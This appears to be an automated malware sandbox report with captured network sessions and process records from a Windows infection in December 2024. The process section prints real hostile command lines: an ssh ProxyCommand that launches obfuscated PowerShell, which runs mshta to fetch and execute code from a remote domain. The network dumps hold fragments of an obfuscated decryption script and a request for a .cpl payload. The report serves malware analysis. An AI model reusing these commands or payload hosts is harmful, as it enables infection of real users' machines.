                                                                                                  Data Ascii: { $EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE = ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE + $DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[$GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG] + $CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC[$GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG % $FFFFFFFFFFF
                                                                                                  2024-12-17 07:48:12 UTC1369INData Raw: 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 20 3d 20 28 24 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 20 2b 20 24 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 5b 24 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 5d 29 20 25 20 32 35 36 0d 0a 20 20 20 20 20 20 20 20 24 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 20 3d 20 24 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 5b 24 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c
                                                                                                  Data Ascii: MMMMMMMMMMMMMMMMMMMMMMM = ($MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM + $JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ[$LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL]) % 256 $PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP = $JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ[$LLLLLLLLLLLLLLLLLLLL
                                                                                                  2024-12-17 07:48:12 UTC1155INData Raw: 4e 65 77 2d 4f 62 6a 65 63 74 20 62 79 74 65 5b 5d 20 24 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 2e 4c 65 6e 67 74 68 0d 0a 0d 0a 20 20 20 20 66 6f 72 20 28 24 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 20 3d 20 30 3b 20 24 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 20 2d 6c 74 20 24 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 53 2e 4c 65 6e 67 74 68 3b 20 24 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 2b 2b 29 20 7b 0d 0a 20
                                                                                                  Data Ascii: New-Object byte[] $SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.Length for ($WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW = 0; $WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW -lt $SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.Length; $WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW++) {
                                                                                                  2024-12-17 07:48:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.549715180.163.242.1024436568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-17 07:48:21 UTC61OUTGET / HTTP/1.1
                                                                                                  Host: www.360.net
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-17 07:48:22 UTC238INHTTP/1.1 301 Moved Permanently
                                                                                                  Server: nginx/1.21.5
                                                                                                  Date: Tue, 17 Dec 2024 07:48:21 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 169
                                                                                                  Connection: close
                                                                                                  Location: https://360.net/
                                                                                                  Content-Security-Policy: upgrade-insecure-requests
                                                                                                  2024-12-17 07:48:22 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.21.5</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.549728103.235.47.1884436568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-17 07:48:27 UTC63OUTGET / HTTP/1.1
                                                                                                  Host: www.baidu.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-17 07:48:28 UTC987INHTTP/1.1 200 OK
                                                                                                  Accept-Ranges: bytes
                                                                                                  Cache-Control: no-cache
                                                                                                  Content-Length: 29638
                                                                                                  Content-Type: text/html
                                                                                                  Date: Tue, 17 Dec 2024 07:48:27 GMT
                                                                                                  P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                  P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                  Pragma: no-cache
                                                                                                  Server: BWS/1.1
                                                                                                  Set-Cookie: BAIDUID=50ECEEF58E525CF3C6F456DF5DB2FEA5:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                  Set-Cookie: BIDUPSID=50ECEEF58E525CF3C6F456DF5DB2FEA5; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                  Set-Cookie: PSTM=1734421707; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                  Set-Cookie: BAIDUID=50ECEEF58E525CF377C9565FF25296D7:FG=1; max-age=31536000; expires=Wed, 17-Dec-25 07:48:27 GMT; domain=.baidu.com; path=/; version=1; comment=bd
                                                                                                  Traceid: 1734421707048131073011640286867167773022
                                                                                                  Vary: Accept-Encoding
                                                                                                  X-Ua-Compatible: IE=Edge,chrome=1
                                                                                                  X-Xss-Protection: 1;mode=block
                                                                                                  Connection: close
                                                                                                  2024-12-17 07:48:28 UTC192INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                  Data Ascii: <!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta content="
                                                                                                  2024-12-17 07:48:28 UTC320INData Raw: 61 6c 77 61 79 73 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 0a 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 e5 85 a8 e7 90 83 e9 a2 86 e5 85 88 e7 9a 84 e4 b8 ad e6 96 87 e6 90 9c e7 b4 a2 e5 bc 95 e6 93 8e e3 80 81 e8 87 b4 e5 8a 9b e4 ba 8e e8 ae a9 e7 bd 91 e6 b0 91 e6 9b b4 e4 be bf e6 8d b7 e5 9c b0 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af ef bc 8c e6 89 be e5 88 b0 e6 89 80 e6 b1 82 e3 80 82 e7 99 be e5 ba a6 e8 b6 85 e8 bf 87 e5 8d 83 e4 ba bf e7 9a 84 e4 b8 ad e6 96 87 e7 bd 91 e9 a1 b5 e6 95 b0 e6 8d ae e5 ba 93 ef bc 8c e5 8f af e4 bb a5 e7 9e ac e9 97 b4 e6 89 be e5 88 b0 e7 9b b8 e5 85 b3 e7 9a 84 e6 90 9c e7 b4 a2
                                                                                                  Data Ascii: always" name="referrer" /> <meta name="description" content="
                                                                                                  2024-12-17 07:48:28 UTC3537INData Raw: 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 0a 20 20 20 20 20 20 20 20 72 65 6c 3d 22 73 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 70 65 6e 73 65 61 72 63 68 64 65 73 63 72 69 70 74 69 6f 6e 2b 78 6d 6c 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 62 61 69 64 75 2e 63 6f 6d 2f 63 6f 6e 74 65 6e 74 2d 73 65 61 72 63 68 2e 78 6d 6c 22 0a 20 20 20 20 20 20 20 20 74 69 74 6c 65 3d 22 e7 99 be e5 ba a6 e6 90 9c e7 b4 a2 22 0a 20 20 20 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 99 be e5 ba a6 e4 b8 80 e4 b8 8b ef bc 8c e4 bd a0 e5 b0 b1 e7 9f a5 e9 81 93 3c 2f 74 69 74 6c
                                                                                                  Data Ascii: .com/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" href="//www.baidu.com/content-search.xml" title="" /> <title></titl
                                                                                                  2024-12-17 07:48:28 UTC4716INData Raw: 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2a 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 77 72 61 70 70 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 35 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a
                                                                                                  Data Ascii: padding-bottom: 100px; text-align: center; *z-index: 1; } #wrapper { min-width: 1250px; height: 100%; min-height: 600px; } #head { position:
                                                                                                  2024-12-17 07:48:28 UTC5895INData Raw: 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 36 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 73 2d 68 6f 74 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 20 2e 73 2d 68 6f 74 73 65 61 72 63 68 2d 63 6f 6e 74 65 6e 74 20 2e 68 6f 74 73 65 61 72 63 68 2d 69 74 65 6d 2e 6f 64 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 73 2d 68 6f 74 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 20 2e 73 2d 68 6f 74 73 65 61 72 63 68 2d 63 6f 6e 74 65 6e 74 20 2e 68 6f 74 73 65 61 72 63 68 2d 69 74 65 6d 2e 65 76 65 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: line-height: 36px; } #s-hotsearch-wrapper .s-hotsearch-content .hotsearch-item.odd { margin-right: 20px; clear: both; } #s-hotsearch-wrapper .s-hotsearch-content .hotsearch-item.even {
                                                                                                  2024-12-17 07:48:28 UTC7074INData Raw: 20 20 20 20 20 20 23 62 6f 74 74 6f 6d 5f 6c 61 79 65 72 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 62 6f 74 74 6f 6d 5f 6c 61 79 65 72 20 2e 73 2d 62 6f 74 74 6f 6d 2d 6c 61 79 65 72 2d 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 63 49 63 6f 6e 66 6f 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 70 73 73 2e 62 64 73 74 61 74 69
                                                                                                  Data Ascii: #bottom_layer a:hover { color: #222; } #bottom_layer .s-bottom-layer-content { text-align: center; } @font-face { font-family: cIconfont; src: url('https://pss.bdstati


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.549739104.21.66.204436568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-17 07:48:30 UTC94OUTGET /naailq0.cpl HTTP/1.1
                                                                                                  Host: berb.fitnessclub-filmfanatics.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-17 07:48:31 UTC578INHTTP/1.1 403 Forbidden
                                                                                                  Date: Tue, 17 Dec 2024 07:48:31 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oll0ScsLPkgKbJza0MKzrcTGwOEAEuKqAPlZpOwSd96YFxxyp0q0fOWAV4Ty6gLU1hn8PwekCV0TJDkM2MYp%2Fn8lOaSGFHwFt9QKHSeAlDTegho8YD0nYmujAgB%2FfyG6OMNW%2FvptkRH7FfjZXXkEcPMneAU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f354faebfd84391-EWR
                                                                                                  2024-12-17 07:48:31 UTC791INData Raw: 31 31 63 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                  Data Ascii: 11cc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                  2024-12-17 07:48:31 UTC1369INData Raw: 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f
                                                                                                  Data Ascii: css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = do
                                                                                                  2024-12-17 07:48:31 UTC1369INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: > <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a>
                                                                                                  2024-12-17 07:48:31 UTC1035INData Raw: 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73
                                                                                                  Data Ascii: d="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item s
                                                                                                  2024-12-17 07:48:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:02:48:00
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" .
                                                                                                  Imagebase:0x7ff6cf660000
                                                                                                  File size:946'176 bytes
                                                                                                  MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:02:48:00
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:02:48:00
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:02:48:02
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4"
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:02:48:02
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4
                                                                                                  Imagebase:0x7ff637bc0000
                                                                                                  File size:14'848 bytes
                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:02:48:05
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:02:48:06
                                                                                                  Start date:17/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
